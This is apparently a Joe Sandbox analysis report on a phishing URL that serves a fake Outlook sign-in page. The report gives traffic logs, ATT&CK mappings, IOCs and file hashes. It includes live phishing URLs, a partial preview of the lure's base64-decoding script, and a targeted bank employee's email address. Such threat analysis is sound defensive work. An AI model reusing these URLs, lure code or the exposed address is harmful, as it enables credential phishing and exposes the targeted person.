      Source: global trafficHTTP traffic detected: GET /download/microsoft/70674-outlook-office-outlook.com-email-logo-365-microsoft.png HTTP/1.1Host: www.freepngimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fleek.ipfs.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pbyn4W+5ton1rMl&MD=KLoN7mFB HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
      Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pbyn4W+5ton1rMl&MD=KLoN7mFB HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
      Source: unknownHTTPS traffic detected: 104.85.244.112:443 -> 192.168.2.4:49744 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49769 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:49771 version: TLS 1.2
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_BITS_2992_900735135Jump to behavior
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2000,i,10604161346318712430,12349371553034259168,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.miglioremacchinadacucire.it/ertyuiop09876sdfg.html#cGVkcm8uZmlndWVpcmFAbm92b2JhbmNvLnB0
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2000,i,10604161346318712430,12349371553034259168,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: classification engineClassification label: mal84.phis.win@17/14@26/13
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management InstrumentationPath Interception1
      Process Injection
      1
      Masquerading
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local SystemExfiltration Over Other Network Medium1
      Encrypted Channel
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
      Process Injection
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth4
      Non-Application Layer Protocol
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration15
      Application Layer Protocol
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer3
      Ingress Tool Transfer
      SIM Card SwapCarrier Billing Fraud
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1324815 URL: https://www.miglioremacchin... Startdate: 12/10/2023 Architecture: WINDOWS Score: 84 24 Snort IDS alert for network traffic 2->24 26 Antivirus detection for URL or domain 2->26 28 Antivirus / Scanner detection for submitted sample 2->28 30 3 other signatures 2->30 6 chrome.exe 1 2->6         started        9 chrome.exe 2->9         started        process3 dnsIp4 14 192.168.2.4, 138, 25, 443 unknown unknown 6->14 16 239.255.255.250 unknown Reserved 6->16 11 chrome.exe 6->11         started        process5 dnsIp6 18 fleek.ipfs.io 209.94.90.1, 443, 49752, 49753 PROTOCOLUS United States 11->18 20 www.freepngimg.com 88.99.162.33, 443, 49768 HETZNER-ASDE Germany 11->20 22 11 other IPs or domains 11->22

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      https://www.miglioremacchinadacucire.it/ertyuiop09876sdfg.html#cGVkcm8uZmlndWVpcmFAbm92b2JhbmNvLnB0100%Avira URL Cloudphishing
      https://www.miglioremacchinadacucire.it/ertyuiop09876sdfg.html#cGVkcm8uZmlndWVpcmFAbm92b2JhbmNvLnB0100%SlashNextCredential Stealing type: Phishing & Social Engineering
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://getbootstrap.com)0%Avira URL Cloudsafe
      http://getbootstrap.com)0%Avira URL Cloudsafe
      https://www.miglioremacchinadacucire.it/ertyuiop09876sdfg.html100%Avira URL Cloudphishing
      https://ipfs.tech/owa/auth/15.1.1591/themes/resources/segoeui-regular.ttf0%Avira URL Cloudsafe

      Download Network PCAP: filteredfull

      NameIPActiveMaliciousAntivirus DetectionReputation
      stackpath.bootstrapcdn.com
      104.18.11.207
      truefalse
        high
        accounts.google.com
        142.250.188.237
        truefalse
          high
          www.miglioremacchinadacucire.it
          217.61.57.241
          truefalse
            unknown
            code.jquery.com
            151.101.2.137
            truefalse
              high
              cdnjs.cloudflare.com
              104.17.24.14
              truefalse
                high
                maxcdn.bootstrapcdn.com
                104.18.11.207
                truefalse
                  high
                  www.google.com
                  142.250.188.228
                  truefalse
                    high
                    clients.l.google.com
                    172.217.14.78
                    truefalse
                      high
                      ipfs.tech
                      185.93.3.244
                      truefalse
                        unknown
                        www.freepngimg.com
                        88.99.162.33
                        truefalse
                          high
                          fleek.ipfs.io
                          209.94.90.1
                          truefalse
                            high
                            clients2.google.com
                            unknown
                            unknownfalse
                              high
                              NameMaliciousAntivirus DetectionReputation
                              https://fleek.ipfs.io/ipfs/bafybeihtztyufkrntgb7cmm4lgq5t54q4wirnm5o5xwj445xq22kpotsqa/owalogo.html#pedro.figueira@novobanco.ptfalse
                                high
                                https://stackpath.bootstrapcdn.com/bootstrap/4.1.0/js/bootstrap.min.jsfalse
                                  high
                                  https://code.jquery.com/jquery-3.2.1.slim.min.jsfalse
                                    high
                                    https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardfalse
                                      high
                                      https://code.jquery.com/jquery-3.3.1.slim.min.jsfalse
                                        high
                                        https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.jsfalse
                                          high
                                          https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.jsfalse
                                            high
                                            https://www.freepngimg.com/download/microsoft/70674-outlook-office-outlook.com-email-logo-365-microsoft.pngfalse
                                              high
                                              https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.0/umd/popper.min.jsfalse
                                                high
                                                https://www.miglioremacchinadacucire.it/ertyuiop09876sdfg.htmlfalse
                                                • Avira URL Cloud: phishing
                                                unknown
                                                https://fleek.ipfs.io/ipfs/bafybeihtztyufkrntgb7cmm4lgq5t54q4wirnm5o5xwj445xq22kpotsqa/owalogo.htmlfalse
                                                  high
                                                  https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.jsfalse
                                                    high
                                                    https://ipfs.tech/owa/auth/15.1.1591/themes/resources/segoeui-regular.ttffalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.google.com/s2/favicons?domain=novobanco.ptfalse
                                                      high
                                                      https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1false
                                                        high
                                                        https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.jsfalse
                                                          high
                                                          https://code.jquery.com/jquery-3.3.1.min.jsfalse
                                                            high
                                                            https://fleek.ipfs.io/owa/auth/15.1.1591/themes/resources/segoeui-regular.ttffalse
                                                              high
                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                              https://outlook.live.com/owa/chromecache_102.1.drfalse
                                                                high
                                                                https://getbootstrap.com/)chromecache_104.1.dr, chromecache_97.1.drfalse
                                                                  high
                                                                  https://www.google.com/s2/favicons?domain=chromecache_102.1.drfalse
                                                                    high
                                                                    https://www.freepngimg.com/download/microsoft/70674-outlook-office-outlook.com-email-logo-365-microschromecache_102.1.drfalse
                                                                      high
                                                                      https://github.com/twbs/bootstrap/graphs/contributors)chromecache_104.1.dr, chromecache_100.1.dr, chromecache_97.1.drfalse
                                                                        high
                                                                        https://getbootstrap.com)chromecache_100.1.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        low
                                                                        https://fleek.ipfs.io/ipfs/bafybeihtztyufkrntgb7cmm4lgq5t54q4wirnm5o5xwj445xq22kpotsqa/owalogo.html#chromecache_103.1.drfalse
                                                                          high
                                                                          http://getbootstrap.com)chromecache_108.1.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          low
                                                                          https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_104.1.dr, chromecache_100.1.dr, chromecache_97.1.drfalse
                                                                            high
                                                                            https://outlook.office.com/mail/chromecache_103.1.drfalse
                                                                              high
                                                                              http://opensource.org/licenses/MIT).chromecache_107.1.dr, chromecache_98.1.drfalse
                                                                                high
                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs
                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                88.99.162.33
                                                                                www.freepngimg.comGermany
                                                                                24940HETZNER-ASDEfalse
                                                                                217.61.57.241
                                                                                www.miglioremacchinadacucire.itItaly
                                                                                202242ARUBA-CLOUDITfalse
                                                                                104.17.24.14
                                                                                cdnjs.cloudflare.comUnited States
                                                                                13335CLOUDFLARENETUSfalse
                                                                                172.217.14.78
                                                                                clients.l.google.comUnited States
                                                                                15169GOOGLEUSfalse
                                                                                185.93.3.244
                                                                                ipfs.techCzech Republic
                                                                                60068CDN77GBfalse
                                                                                151.101.2.137
                                                                                code.jquery.comUnited States
                                                                                54113FASTLYUSfalse
                                                                                104.18.11.207
                                                                                stackpath.bootstrapcdn.comUnited States
                                                                                13335CLOUDFLARENETUSfalse
                                                                                142.250.217.132
                                                                                unknownUnited States
                                                                                15169GOOGLEUSfalse
                                                                                239.255.255.250
                                                                                unknownReserved
                                                                                unknownunknownfalse
                                                                                142.250.188.237
                                                                                accounts.google.comUnited States
                                                                                15169GOOGLEUSfalse
                                                                                142.250.188.228
                                                                                www.google.comUnited States
                                                                                15169GOOGLEUSfalse
                                                                                209.94.90.1
                                                                                fleek.ipfs.ioUnited States
                                                                                40680PROTOCOLUSfalse
                                                                                IP
                                                                                192.168.2.4
                                                                                Joe Sandbox Version:38.0.0 Ammolite
                                                                                Analysis ID:1324815
                                                                                Start date and time:2023-10-12 17:41:19 +02:00
                                                                                Joe Sandbox Product:CloudBasic
                                                                                Overall analysis duration:0h 3m 0s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:browseurl.jbs
                                                                                Sample URL:https://www.miglioremacchinadacucire.it/ertyuiop09876sdfg.html#cGVkcm8uZmlndWVpcmFAbm92b2JhbmNvLnB0
                                                                                Analysis system description:Windows 10 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                Number of analysed new started processes analysed:9
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Detection:MAL
                                                                                Classification:mal84.phis.win@17/14@26/13
                                                                                EGA Information:Failed
                                                                                HCA Information:
                                                                                • Successful, ratio: 100%
                                                                                • Number of executed functions: 0
                                                                                • Number of non-executed functions: 0
                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe
                                                                                • Excluded IPs from analysis (whitelisted): 142.250.72.131, 34.104.35.123, 142.250.217.138, 142.250.189.10, 142.250.72.138, 172.217.14.106, 142.250.176.10, 142.250.188.234, 172.217.14.74, 142.251.40.42, 142.250.68.74, 172.217.12.138, 142.250.72.170, 142.250.72.234, 172.217.12.132, 192.229.211.108, 142.250.68.35
                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, edgedl.me.gvt1.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ajax.googleapis.com, update.googleapis.com, clientservices.googleapis.com, t1.gstatic.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                • VT rate limit hit for: https://www.miglioremacchinadacucire.it/ertyuiop09876sdfg.html#cGVkcm8uZmlndWVpcmFAbm92b2JhbmNvLnB0
                                                                                No simulations
                                                                                No context
                                                                                No context
                                                                                No context
                                                                                No context
                                                                                No context
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with very long lines (48664)
                                                                                Category:downloaded
                                                                                Size (bytes):48944
                                                                                Entropy (8bit):5.272507874206726
                                                                                Encrypted:false
                                                                                SSDEEP:768:9VG5R15WbHVKZrycEHSYro34CrSLB6WU/6DqBf4l1B:9VIRuo53XiwWTvl1B
                                                                                MD5:14D449EB8876FA55E1EF3C2CC52B0C17
                                                                                SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
                                                                                SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
                                                                                SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
                                                                                Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with very long lines (65451)
                                                                                Category:downloaded
                                                                                Size (bytes):86927
                                                                                Entropy (8bit):5.289226719276158
                                                                                Encrypted:false
                                                                                SSDEEP:1536:jLiBdiaWLOczCmZx6+VWuGzQNOzdn6x2RZd9SEnk9HB96c9Yo/NWLbVj3kC6t3:5kn6x2xe9NK6nC69
                                                                                MD5:A09E13EE94D51C524B7E2A728C7D4039
                                                                                SHA1:0DC32DB4AA9C5F03F3B38C47D883DBD4FED13AAE
                                                                                SHA-256:160A426FF2894252CD7CEBBDD6D6B7DA8FCD319C65B70468F10B6690C45D02EF
                                                                                SHA-512:F8DA8F95B6ED33542A88AF19028E18AE3D9CE25350A06BFC3FBF433ED2B38FEFA5E639CDDFDAC703FC6CAA7F3313D974B92A3168276B3A016CEB28F27DB0714A
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                URL:https://code.jquery.com/jquery-3.3.1.min.js
                                                                                Preview:/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(e,t){"use strict";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return"function"==typeof t&&"number"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement("script");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?l[c.call(e)]||"object":typeof e}var b="3.3.1",w=function(e,t){return new w.fn.init(e,t)},
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:HTML document, ASCII text, with very long lines (15942), with CRLF line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):501042
                                                                                Entropy (8bit):3.455025640356459
                                                                                Encrypted:false
                                                                                SSDEEP:3072:SXdx6rhB9CyHxX7Be7iAvtLPbAwuBNKifXTJ3yjxuz+9BD:Oez9VxLY7iAVLTBQJlCF5D
                                                                                MD5:02D1A1A9F3DCF1A05333CD2403E28F46
                                                                                SHA1:46A4A5A05A2006F04CAEF5647FD596FECCA1A057
                                                                                SHA-256:12784006BC7554786D23F78784F8471F937F92C699FAD9D21376ED90F1206DFA
                                                                                SHA-512:A927B1C8D552C38825650C9B2D3D4C27118F821BA8C6B90022FCA2DE91B1F03DACE396F5B4107128C8109BE80F6C3E5DF8F760FA0F679A8EDEED7E78D889C2A2
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                URL:https://fleek.ipfs.io/ipfs/bafybeihtztyufkrntgb7cmm4lgq5t54q4wirnm5o5xwj445xq22kpotsqa/owalogo.html
                                                                                Preview:..<html>..<head>..<meta http-equiv="X-UA-Compatible" content="IE=10" />.........<link rel="shortcut icon" href="https://www.freepngimg.com/download/microsoft/70674-outlook-office-outlook.com-email-logo-365-microsoft.png" type="image/x-icon">..<meta http-equiv="Content-Type" content="text/html; CHARSET=utf-8">..<meta name="Robots" content="NOINDEX, NOFOLLOW">..<title>Outlook</title>..<style>..@font-face {.. font-family: "wf_segoe-ui_normal";.. src: url("/owa/auth/15.1.1591/themes/resources/segoeui-regular.eot?#iefix") format("embedded-opentype"),.. url("/owa/auth/15.1.1591/themes/resources/segoeui-regular.ttf") format("truetype");..}....@font-face {.. font-family: "wf_segoe-ui_semilight";.. src: url("/owa/auth/15.1.1591/themes/resources/segoeui-semilight.eot?#iefix") format("embedded-opentype"),.. url("/owa/auth/15.1.1591/themes/resources/segoeui-semilight.ttf") format("truetype");..}....@font-face {.. font-family: "wf_segoe-ui_semibold";.. src: url("
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:HTML document, ASCII text, with very long lines (64051), with CRLF, LF line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):196303
                                                                                Entropy (8bit):3.9769136755977006
                                                                                Encrypted:false
                                                                                SSDEEP:1536:frOK3Zl1BGKCOptCcptldNujL82Q7XOCHgSjCs9WPUZUje9hkjdGqTP5Aytvtmry:frhB9CyHxX7Be7iAvtLPbAwuBNKifXY
                                                                                MD5:4906E4E8D76AA4681B5F2D7E76FC9B85
                                                                                SHA1:9371ADA67F9881EBD0C881B1C578E95F99049674
                                                                                SHA-256:939F6E3576CE84BBEE4677B90D4B9F3D01893AF37DDC7561C101B4C7560118BA
                                                                                SHA-512:6447E84FD9029B44AA47B27324447BF44F816D188C60E5853E8AFAE456D0203748338B29473D1E1ADC64C81CC0F9C798B033713DE54B75921C4A31F23907DBBC
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                URL:https://www.miglioremacchinadacucire.it/ertyuiop09876sdfg.html
                                                                                Preview:<!DOCTYPE html>.<html>. <head>. <meta charset="utf-8">. <meta http-equiv="X-UA-Compatible" content="IE=edge">. <title>Sign in to your account</title>. <meta name="viewport" content="width=device-width, initial-scale=1">. </head>. <body>. <script>. . function b64DecodeUnicode(str) {. // Going backwards: from bytestream, to percent-encoding, to original string.. return decodeURIComponent(atob(str).split('').map(function(c) {. return '%' + ('00' + c.charCodeAt(0).toString(16)).slice(-2);. }).join(''));. }. . function redirectPage(){. var query = window.location.href;. console.log(query);. var res = query.split("#");. var data1 = res[0];. var data2 = res[1];. console.log(data1);. console.log(data2);. . var id = b64DecodeUnicode(data2);. console.log(id);. . if (da
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with very long lines (50395)
                                                                                Category:downloaded
                                                                                Size (bytes):50676
                                                                                Entropy (8bit):5.276454699305197
                                                                                Encrypted:false
                                                                                SSDEEP:768:D2Ybgh0GBxTHVmcmjWSLsynS/zZ/AcyUenY8yiKKdHPPm26Ro1FH4nx46:D2jh02Lh+SbZ/AbYqdm2mx46
                                                                                MD5:CE6E785579AE4CB555C9DE311D1B9271
                                                                                SHA1:5EF2C15B47D7290698C737676BA9C3056B45F2E8
                                                                                SHA-256:0BCA10549DF770AB6790046799E5A9E920C286453EBBB2AFB0D3055339245339
                                                                                SHA-512:A601871568C1B5B2874D30D6E5BB8667D994D2719FC4D6AF7F99162BF39DDAE800FFFF45B8C1C0BA790088C7B98DE2FFE565B5AF4531C0A8BA0F92E930E243DF
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                URL:https://stackpath.bootstrapcdn.com/bootstrap/4.1.0/js/bootstrap.min.js
                                                                                Preview:/*!. * Bootstrap v4.1.0 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,c){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function o(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function h(r){for(var t=1;t<arguments.length;t++){var s=null!=arguments[t]?arguments[t]:{},e=Object.keys(s);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(s).filter(function(t){return Object.getOwnPropertyDescriptor(s,t).enum
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                Category:downloaded
                                                                                Size (bytes):726
                                                                                Entropy (8bit):7.658584865417114
                                                                                Encrypted:false
                                                                                SSDEEP:12:6v/7s/6gH5LoxFZA0qHd4+bT8g6iY1kEsBfLxeg5M7RqkC9xyNF:EkhoTd2nT8jR1NsBT4gWc99xeF
                                                                                MD5:B8A0BF372C762E966CC99EDE8682BC71
                                                                                SHA1:2D7C9B60D1E2B4F4726141DE2E4AB738110B9287
                                                                                SHA-256:59BFE9BC385AD69F50793CE4A53397316D7A875A7148A63C16DF9B674C6CDA64
                                                                                SHA-512:6883C7A3F702FB3DF5E698333C8A05705970FCB476A31A2008444A02122B6870DE158176C86A1F6605A0783B88D3523646B4D288696E777B37CC02D5D95266CA
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                URL:"https://t1.gstatic.com/faviconV2?client=SOCIAL&type=FAVICON&fallback_opts=TYPE,SIZE,URL&url=http://novobanco.pt&size=16"
                                                                                Preview:.PNG........IHDR................a....pHYs...........~.....IDAT8..S.O.Q....nK.P.T[.B."D0..R.9..!..Y.*.....c.x.h..U......T..Z.Yh.-..B.oFk..N....x.7..S.^......L&..\.....8b..b.....U'.y.Wv..SV.y^J.I...;........~l..../.>[............Mf.....l......-....m6s...F.....s......%_ .)@....C.pT1...C....lf..'ig........\..B.0.j....=J.x..K.{..x..414wn....c.@............o.=f.p.[.tv..@....;...^]?....`.&&..t:-....L..f....xaG>.....0....EUs....o...j....]...P..UY.....D..w../.V....}..(.......v.P\g.}..a.\.;..v..G.......#n..........?.i...CN)..w!.:K.V..=.{.1x@....>2......Y.o@._..g...J..B....2.$X@D...W2<..fZ\............z......wj.<..+.x...t...r-<..~[.c.&.Y8=L.....{.g.Tu.`..6G..5.%...?...._..X!.^........IEND.B`.
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):40
                                                                                Entropy (8bit):4.458694969562841
                                                                                Encrypted:false
                                                                                SSDEEP:3:mSxdnPbSsvVXyY:mSxBPbScVXL
                                                                                MD5:56EABAE3044236C45528E01FE21C6474
                                                                                SHA1:D40180E0A48ECB78DC7321867E2A5568DC12689C
                                                                                SHA-256:14C9B2EDD6B7F8F4E4B8919D81E7A626786178F1209BC1C9F473711A1C106A1B
                                                                                SHA-512:24F45556CF865B30E59805FBAED50E8DF06EC17F47305825B2157B6A67B56C5F5ECCAF2E79A77067450CDB1C34936DAB442562E61CF7476F12EB7AC2B0D5898D
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISHglbD744a8RUsRIFDYOoWz0SBQ3OQUx6EgUNTx8adg==?alt=proto
                                                                                Preview:ChsKBw2DqFs9GgAKBw3OQUx6GgAKBw1PHxp2GgA=
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with very long lines (20322)
                                                                                Category:downloaded
                                                                                Size (bytes):20495
                                                                                Entropy (8bit):5.217693761954058
                                                                                Encrypted:false
                                                                                SSDEEP:384:f5LFrVVVnCQvIR/CFU4hHPV4kdxXvYqo2D75zCx+vI2am3MxGpGTgd/9jt9+Db9A:hNVVVnyiU41xXvlD7wx+v0xyGTgnZO9A
